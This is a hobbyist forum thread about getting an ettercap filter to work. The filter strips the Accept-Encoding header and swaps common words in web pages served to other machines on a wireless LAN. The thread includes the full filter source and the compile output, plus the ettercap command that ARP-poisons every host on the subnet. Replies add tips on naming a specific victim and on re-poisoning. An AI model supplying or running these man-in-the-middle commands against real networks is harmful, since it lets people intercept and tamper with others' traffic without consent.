ettercap filter problem

[imported_pynstrom]

I've read a couple of tutorials from the ettercap forums and from irongeek, and created a small filter to misspell two commonly used words:

Code:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      msg("accepting rubbish\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("the", "teh");
   replace("The", "Teh");
   replace("THE", "TEH");
   msg("the filter ran.\n");
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("and", "adn");
   replace("And", "Adn");
   replace("AND", "ADN");
   msg("and filter ran.\n");
}

Note: I've also tried replacing "and" & "the" in the same function.

The filter compiles just fine:

Code:

~# etterfilter -o /root/filter.ef misspell.filter

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
 11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
 Parsing source file 'misspell.filter'  done.
 Unfolding the meta-tree  done.
 Converting labels to real offsets  done.
 Writing output to 'filter.ef'  done.
 -> Script encoded into 25 instructions.

Then I run ettercap in text mode

Code:

~# ettercap -Tq -i wlan0 -F filter.ef -M arp // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from filter.ef...
Listening on wlan0... (Ethernet)

 wlan0 ->       00:c0:ca:25:0a:f4       192.168.1.3     255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

7 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : ANY (all the hosts in the list)

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

When I surf the internet on a separate box connected to the same network the filter msg runs as if the filter worked, but the text on the target machine is unaffected. I compared to the filter used in irongeek's tutorial and I don't see any difference. Could someone give me a shove in the right direction. Thank you for your time.

[compaq]

I had the same problem to fix when it says help press -h then -p and type chk_posion(and check the computer to posion shouldn't show up, if it does) then type reposion_arp then check that its not listed with chk_posion.

hope it helps

[imported_=Tron=]

Well first of all your code does seem to be correct and as it compiles without errors there should be no problem with it. Have you tried to specify the victim instead of running the script for all clients on the subnet?

I have noticed this same problem with the script apparently running but no change seen on the victim PC when you do not specify the victim.

[imported_pynstrom]

Have you tried to specify the victim instead of running the script for all clients on the subnet?

I have noticed this same problem with the script apparently running but no change seen on the victim PC when you do not specify the victim.

The obvious has never been my strong suit. I always seem to spend too much time looking for a complicated answer. Thanks for your help Tron.